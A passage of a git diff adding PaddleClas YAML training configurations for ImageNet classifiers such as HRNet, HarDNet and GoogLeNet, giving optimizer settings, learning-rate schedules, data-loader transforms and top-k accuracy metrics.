./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W30_C.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W30_C.yaml new file mode 100644 index 0000000..1e80d09 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W30_C.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: HRNet_W30_C + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W32_C.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W32_C.yaml new file mode 100644 index 0000000..8d8cc6c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W32_C.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: HRNet_W32_C + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W40_C.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W40_C.yaml new file mode 100644 index 0000000..6224a2c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W40_C.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: HRNet_W40_C + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W44_C.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W44_C.yaml new file mode 100644 index 0000000..cef9845 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W44_C.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: HRNet_W44_C + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W48_C.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W48_C.yaml new file mode 100644 index 0000000..0969104 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W48_C.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: HRNet_W48_C + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W64_C.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W64_C.yaml new file mode 100644 index 0000000..557c1f5 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HRNet/HRNet_W64_C.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: HRNet_W64_C + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet39_ds.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet39_ds.yaml new file mode 100644 index 0000000..ac21d5e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet39_ds.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: HarDNet39_ds + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet68.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet68.yaml new file mode 100644 index 0000000..258ce14 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet68.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: HarDNet68 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet68_ds.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet68_ds.yaml new file mode 100644 index 0000000..a3837d2 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet68_ds.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: HarDNet68_ds + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet85.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet85.yaml new file mode 100644 index 0000000..f60e10b --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet85.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: HarDNet85 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Inception/GoogLeNet.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Inception/GoogLeNet.yaml new file mode 100644 index 0000000..579b01c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Inception/GoogLeNet.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: GoogLeNet + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - GoogLeNetLoss: + weight: 1.0 + Eval: + - GoogLeNetLoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.01 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - 